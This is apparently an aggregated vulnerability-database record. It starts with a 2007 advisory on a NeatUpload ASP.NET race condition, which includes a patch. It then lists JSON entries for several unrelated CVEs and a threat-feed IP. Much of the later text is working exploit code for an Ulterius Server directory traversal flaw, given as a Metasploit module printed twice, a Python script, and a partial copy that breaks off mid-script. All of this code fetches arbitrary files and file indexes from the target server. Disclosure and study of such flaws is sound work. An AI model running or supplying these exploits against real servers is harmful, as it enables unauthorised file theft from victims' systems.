ID SECURITYVULNS:DOC:16806 Type securityvulns Reporter Securityvulns Modified 2007-04-20T00:00:00
Description
Product: NeatUpload
Synopsis: A race condition in several versions of the NeatUpload ASP.NET component could sometimes cause portions of responses to be sent to the wrong user, potentially revealing sensitive information to unauthorized users.
Vulnerable versions: 1.2.11-1.2.16, 1.1.18-1.1.23, and trunk.379-trunk.445.
Fixed in: 1.2.17, 1.1.24, and trunk.448
Credit: Thanks to Jamie Howell with starnow.com, and Michael Teper with Elanex, Inc. (www.elanex.com), for reporting the problem and testing the fix.
Detailed description:
The problem was caused by part of a fix introduced in 1.2.11 (and 1.1.18) which caused HttpWorkerRequest.FlushResponse(bool finalFlush) to be called twice for the same HttpWorkerRequest with finalFlush=true. That probably caused ASP.NET's response buffer to be reused for another request before the response was sent. The problem is more likely to occur when the server is handling multiple requests simultaneously.
The easiest way to exploit this vulnerability would be to make many simultaneous requests to the server, hoping to trigger the problem and receive a portion of another users response that contains sensitive information.
Recommended fix:
Users should upgrade to latest patch version for the release they are using.
Alternatively, the following patch can be applied:
Index: DecoratedWorkerRequest.cs
--- DecoratedWorkerRequest.cs (revision 442)
+++ DecoratedWorkerRequest.cs (revision 443)
@@ -125,8 +125,9 @@
{
if (Exception == null)
{
- if (log.IsDebugEnabled) log.Debug("Calling FlushResponse(" + finalFlush + ")");
- OrigWorker.FlushResponse(finalFlush);
+ if (log.IsDebugEnabled) log.Debug("FlushResponse(" + finalFlush + ") called -> Calling FlushResponse(false)");
+ // Always pass false so that ASP.NET doesn't recycle response buffers while they are still in use.
+ OrigWorker.FlushResponse(false);
}
}
{"id": "SECURITYVULNS:DOC:16806", "bulletinFamily": "software", "title": "NeatUpload vulnerability and fix", "description": "Product: NeatUpload\r\n\r\nSynopsis: A race condition in several versions of the NeatUpload ASP.NET component could sometimes cause portions of responses to be sent to the wrong user, potentially revealing sensitive information to unauthorized users.\r\n\r\nVulnerable versions: 1.2.11-1.2.16, 1.1.18-1.1.23, and trunk.379-trunk.445.\r\n\r\nFixed in: 1.2.17, 1.1.24, and trunk.448\r\n\r\nCredit: Thanks to Jamie Howell with starnow.com, and Michael Teper with Elanex, Inc. (www.elanex.com), for reporting the problem and testing the fix.\r\n\r\nDetailed description:\r\n\r\nThe problem was caused by part of a fix introduced in 1.2.11 (and 1.1.18) which caused HttpWorkerRequest.FlushResponse(bool finalFlush) to be called twice for the same HttpWorkerRequest with finalFlush=true. That probably caused ASP.NET's response buffer to be reused for another request before the response was sent. The problem is more likely to occur when the server is handling multiple requests simultaneously.\r\n\r\nThe easiest way to exploit this vulnerability would be to make many simultaneous requests to the server, hoping to trigger the problem and receive a portion of another users response that contains sensitive information.\r\n\r\nRecommended fix:\r\n\r\nUsers should upgrade to latest patch version for the release they are using. \r\n\r\nAlternatively, the following patch can be applied:\r\n\r\nIndex: DecoratedWorkerRequest.cs\r\n===================================================================\r\n--- DecoratedWorkerRequest.cs (revision 442)\r\n+++ DecoratedWorkerRequest.cs (revision 443)\r\n@@ -125,8 +125,9 @@\r\n {\r\n if (Exception == null)\r\n {\r\n- if (log.IsDebugEnabled) log.Debug("Calling FlushResponse(" + finalFlush + ")");\r\n- OrigWorker.FlushResponse(finalFlush);\r\n+ if (log.IsDebugEnabled) log.Debug("FlushResponse(" + finalFlush + ") called -> Calling FlushResponse(false)");\r\n+ // Always pass false so that ASP.NET doesn't recycle response buffers while they are still in use.\r\n+ OrigWorker.FlushResponse(false);\r\n }\r\n }\r\n\r\n\r\n\r\n", "published": "2007-04-20T00:00:00", "modified": "2007-04-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16806", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 12, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-08-31T11:10:21", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2017-16806", "CVE-2015-9286", "CVE-2018-16806", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/ULTERIUS_FILE_DOWNLOAD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144994"]}, {"type": "zdt", "idList": ["1337DAY-ID-28984"]}, {"type": "exploitdb", "idList": ["EDB-ID:43141"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:61D5F57618B98619E355D261C4E1149D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32659", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:21", "rev": 2}, "vulnersScore": 5.9}, "affectedSoftware": []}
{"rst": [{"lastseen": "2020-11-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **78[.]142.194.51** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **28**.\n First seen: 2020-10-06T03:00:00, Last seen: 2020-11-04T03:00:00.\n IOC tags: **generic**.\nASN 3214: (First IP 78.142.192.0, Last IP 78.142.195.255).\nASN Name \"XTOM\" and Organisation \"xTom\".\nASN hosts 16806 domains.\nGEO IP information: City \"Amsterdam\", Country \"Netherlands\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-10-06T00:00:00", "id": "RST:B5499621-E9B8-38EF-9831-AE34E13C98E5", "href": "", "published": "2020-11-05T00:00:00", "title": "RST Threat feed. IOC: 78.142.194.51", "type": "rst", "cvss": {}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:52:31", "description": "A Pektron Passive Keyless Entry and Start (PKES) system, as used on the Tesla Model S and possibly other vehicles, relies on the DST40 cipher, which makes it easier for attackers to obtain access via an approach involving a 5.4 TB precomputation, followed by wake-frame reception and two challenge/response operations, to clone a key fob within a few seconds.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-09-10T23:29:00", "title": "CVE-2018-16806", "type": "cve", "cwe": ["CWE-327"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16806"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:pektron:passive_keyless_entry_and_start_system_firmware:-"], "id": "CVE-2018-16806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16806", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:pektron:passive_keyless_entry_and_start_system_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-11-13T21:29:00", "title": "CVE-2017-16806", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16806"], "modified": "2017-11-29T15:16:00", "cpe": ["cpe:/a:ulterius:ulterius_server:1.5.6.0", "cpe:/a:ulterius:ulterius_server:1.8.0.0"], "id": "CVE-2017-16806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16806", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ulterius:ulterius_server:1.8.0.0:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2021-02-16T09:41:43", "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0 to download files from the affected host. A valid file path is needed to download a file. Fortunately, Ulterius indexes every file on the system, which can be stored in the following location: http://ulteriusURL:port/.../fileIndex.db. This module can download and parse the fileIndex.db file. There is also an option to download a file using a provided path.\n", "published": "2018-02-06T04:50:09", "type": "metasploit", "title": "Ulterius Server File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-02-12T13:31:51", "id": "MSF:AUXILIARY/ADMIN/HTTP/ULTERIUS_FILE_DOWNLOAD/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ulterius Server File Download Vulnerability',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.\n },\n 'Author' =>\n [\n 'Rick Osgood', # Vulnerability discovery and PoC\n 'Jacob Robles' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '43141' ],\n [ 'CVE', '2017-16806' ]\n ]))\n\n register_options(\n [\n Opt::RPORT(22006),\n OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']),\n ])\n end\n\n def process_data(index, parse_data)\n length = parse_data[index].unpack('C')[0]\n length += parse_data[index+1].unpack('C')[0]\n length += parse_data[index+2].unpack('C')[0]\n length += parse_data[index+3].unpack('C')[0]\n\n index += 4\n filename = parse_data[index...index+length]\n index += length\n return index, filename\n end\n\n def inflate_parse(data)\n zi = Zlib::Inflate.new(-15)\n data_inflated = zi.inflate(data)\n\n parse_data = data_inflated[8...-1]\n remote_files = \"\"\n\n index = 0\n print_status('Starting to parse fileIndex.db...')\n while index < parse_data.length\n index, filename = process_data(index, parse_data)\n index, directory = process_data(index, parse_data)\n remote_files << directory + '\\\\' + filename + \"\\n\"\n\n #skip FFFFFFFFFFFFFFFF\n index += 8\n end\n myloot = store_loot('ulterius.fileIndex.db', 'text/plain', datastore['RHOST'], remote_files, 'fileIndex.db', 'Remote file system')\n print_status(\"Remote file paths saved in: #{myloot.to_s}\")\n end\n\n def run\n path = datastore['PATH']\n # Always make sure there is a starting slash so as an user,\n # we don't need to worry about it.\n path = \"/#{path}\" if path && path[0] != '/'\n\n print_status(\"Requesting: #{path}\")\n\n begin\n res = send_request_cgi({\n 'uri' => normalize_uri(path),\n 'method' => 'GET'\n })\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable, Errno::ECONNRESET => e\n vprint_error(\"Failed: #{e.class} - #{e.message}\")\n return\n end\n\n if res && res.code == 200\n if path =~ /fileIndex\\.db/i\n inflate_parse(res.body)\n else\n myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system')\n print_status(\"File contents saved: #{myloot.to_s}\")\n end\n end\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/ulterius_file_download.rb"}, {"lastseen": "2020-02-23T04:06:19", "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0 to download files from the affected host. A valid file path is needed to download a file. Fortunately, Ulterius indexes every file on the system, which can be stored in the following location: http://ulteriusURL:port/.../fileIndex.db. This module can download and parse the fileIndex.db file. There is also an option to download a file using a provided path.\n", "published": "2018-02-06T04:50:09", "type": "metasploit", "title": "Ulterius Server File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16806"], "modified": "2018-02-15T22:31:09", "id": "MSF:AUXILIARY/ADMIN/HTTP/ULTERIUS_FILE_DOWNLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ulterius Server File Download Vulnerability',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.\n },\n 'Author' =>\n [\n 'Rick Osgood', # Vulnerability discovery and PoC\n 'Jacob Robles' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '43141' ],\n [ 'CVE', '2017-16806' ]\n ]))\n\n register_options(\n [\n Opt::RPORT(22006),\n OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']),\n ])\n end\n\n def process_data(index, parse_data)\n length = parse_data[index].unpack('C')[0]\n length += parse_data[index+1].unpack('C')[0]\n length += parse_data[index+2].unpack('C')[0]\n length += parse_data[index+3].unpack('C')[0]\n\n index += 4\n filename = parse_data[index...index+length]\n index += length\n return index, filename\n end\n\n def inflate_parse(data)\n zi = Zlib::Inflate.new(window_bits =-15)\n data_inflated = zi.inflate(data)\n\n parse_data = data_inflated[8...-1]\n remote_files = \"\"\n\n index = 0\n print_status('Starting to parse fileIndex.db...')\n while index < parse_data.length\n index, filename = process_data(index, parse_data)\n index, directory = process_data(index, parse_data)\n remote_files << directory + '\\\\' + filename + \"\\n\"\n\n #skip FFFFFFFFFFFFFFFF\n index += 8\n end\n myloot = store_loot('ulterius.fileIndex.db', 'text/plain', datastore['RHOST'], remote_files, 'fileIndex.db', 'Remote file system')\n print_status(\"Remote file paths saved in: #{myloot.to_s}\")\n end\n\n def run\n path = datastore['PATH']\n # Always make sure there is a starting slash so as an user,\n # we don't need to worry about it.\n path = \"/#{path}\" if path && path[0] != '/'\n\n print_status(\"Requesting: #{path}\")\n\n begin\n res = send_request_cgi({\n 'uri' => normalize_uri(path),\n 'method' => 'GET'\n })\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable, Errno::ECONNRESET => e\n vprint_error(\"Failed: #{e.class} - #{e.message}\")\n return\n end\n\n if res && res.code == 200\n if path =~ /fileIndex\\.db/i\n inflate_parse(res.body)\n else\n myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system')\n print_status(\"File contents saved: #{myloot.to_s}\")\n end\n end\n end\n\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/ulterius_file_download.rb"}], "packetstorm": [{"lastseen": "2017-11-15T06:00:57", "description": "", "published": "2017-11-15T00:00:00", "type": "packetstorm", "title": "Ulterius Server Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16806"], "modified": "2017-11-15T00:00:00", "id": "PACKETSTORM:144994", "href": "https://packetstormsecurity.com/files/144994/Ulterius-Server-Directory-Traversal.html", "sourceData": "`# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access \n# Date: 11/13/2017 \n# Exploit Author: Rick Osgood \n# Vendor Homepage: https://ulterius.io/ \n# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d \n# Version: < 1.9.5.0 \n# Tested on: Windows Server 2012 R2 \n# CVE : CVE-2017-16806 \n# \n# You can download almost any file that resides on the same drive letter as Ulterius server. \n# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini \n# \n# Unfortunately, you need to know the path to the file you want to download. \n# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place: \n# http://ulteriusURL:2206/.../fileIndex.db \n# \n# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to \n# make it human readable. Then you can use the same script to download any juicy files you find. \n# \n# Ulterius writes the following to the fileIndex.db file: \n# First four bytes are a timestamp so we can ignore this \n# The next four items repeat until the end of the file: \n# filename.length (4 bytes?) \n# filename \n# directory.length (4 bytes?) \n# directory \n \nimport requests \nimport sys \nimport argparse \nimport zlib \nimport struct \n \n# This function grabs the filename or file path from the fileIndex \ndef processChunk(i, data): \nlength = struct.unpack('B', data[i])[0] \nlength += struct.unpack('B', data[i+1])[0] \nlength += struct.unpack('B', data[i+2])[0] \nlength += struct.unpack('B', data[i+3])[0] \n \ni += 4 \nfilename = data[i:i+length] \ni += length \n \nreturn i, filename \n \n# Main function \ndef main(): \n# Parse arguments \nparser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood') \nparser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port') \nparser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\\windows\\win.ini)') \nparser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true') \nargs = parser.parse_args() \n \n# We are going to retrieve a specified file \nif args.retrieve: \nfileName = str(args.retrieve[0]) \n \n# This works for the default Ulterius install directory. \nbaseDir = \"/.../.../.../.../.../.../.../.../.../\" \n \n# Remove slashes from output file name \noutFile = fileName.replace('\\\\','_') \n \n# Remove drive letter and change slashes \nif \":\\\\\" in fileName[:3]: \nfileName = fileName[3:] \n \n# Replace slashes \nfileName = fileName.replace('\\\\','/') # Replace slashes \n \n# Build URL \nurl = str(args.url[0]) + baseDir + fileName \nprint \"Retrieving \" + url \n \n# Download file \nr = requests.get(url=url, stream=True) # Retrieve file \n \n# Write file \nf = open(outFile, 'w') \nf.write(r.content) \n \n# We are going to download the fileIndex.db file \nif args.index: \n# Setup the URL \nurl = args.url[0] + \"/.../fileIndex.db\" \nprint \"Downloading \" + url \n \n# Download file \nr = requests.get(url=url, stream=True) \n \n# decompress the data \ndata = zlib.decompress( r.content, -15 ) \n \n# Open output file for writing \nf = open('fileIndex.db', 'w') \n \n# Strip off header info (not sure what this is) \ndata = data[8:] \n \n# Process file names and write to output file \ni = 0 \nwhile i < len(data): \ni, filename = processChunk(i, data) # Get file name \ni, directory = processChunk(i, data) # Get file path \ni += 8 # Skip the FFFFFFFFFFFFFFFF \nf.write(directory + '\\\\' + filename + '\\n') # Write to output file \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144994/ulterius-traversal.txt"}], "zdt": [{"lastseen": "2018-04-11T21:53:24", "edition": 1, "description": "Exploit for windows platform in category remote exploits", "published": "2017-11-14T00:00:00", "title": "Ulterius Server < 1.9.5.0 - Directory Traversal Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16806"], "modified": "2017-11-14T00:00:00", "href": "https://0day.today/exploit/description/28984", "id": "1337DAY-ID-28984", "sourceData": "# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access\r\n# Date: 11/13/2017\r\n# Exploit Author: Rick Osgood\r\n# Vendor Homepage: https://ulterius.io/\r\n# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d\r\n# Version: < 1.9.5.0\r\n# Tested on: Windows Server 2012 R2\r\n# CVE : CVE-2017-16806\r\n#\r\n# You can download almost any file that resides on the same drive letter as Ulterius server.\r\n# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini\r\n#\r\n# Unfortunately, you need to know the path to the file you want to download.\r\n# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:\r\n# http://ulteriusURL:2206/.../fileIndex.db\r\n#\r\n# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to\r\n# make it human readable. Then you can use the same script to download any juicy files you find.\r\n#\r\n# Ulterius writes the following to the fileIndex.db file:\r\n # First four bytes are a timestamp so we can ignore this\r\n# The next four items repeat until the end of the file:\r\n # filename.length (4 bytes?)\r\n # filename\r\n # directory.length (4 bytes?)\r\n # directory\r\n \r\nimport requests\r\nimport sys\r\nimport argparse\r\nimport zlib\r\nimport struct\r\n \r\n# This function grabs the filename or file path from the fileIndex\r\ndef processChunk(i, data):\r\n length = struct.unpack('B', data[i])[0]\r\n length += struct.unpack('B', data[i+1])[0]\r\n length += struct.unpack('B', data[i+2])[0]\r\n length += struct.unpack('B', data[i+3])[0]\r\n \r\n i += 4\r\n filename = data[i:i+length]\r\n i += length\r\n \r\n return i, filename\r\n \r\n# Main function\r\ndef main():\r\n # Parse arguments\r\n parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')\r\n parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')\r\n parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\\windows\\win.ini)')\r\n parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')\r\n args = parser.parse_args()\r\n \r\n # We are going to retrieve a specified file\r\n if args.retrieve:\r\n fileName = str(args.retrieve[0])\r\n \r\n # This works for the default Ulterius install directory.\r\n baseDir = \"/.../.../.../.../.../.../.../.../.../\"\r\n \r\n # Remove 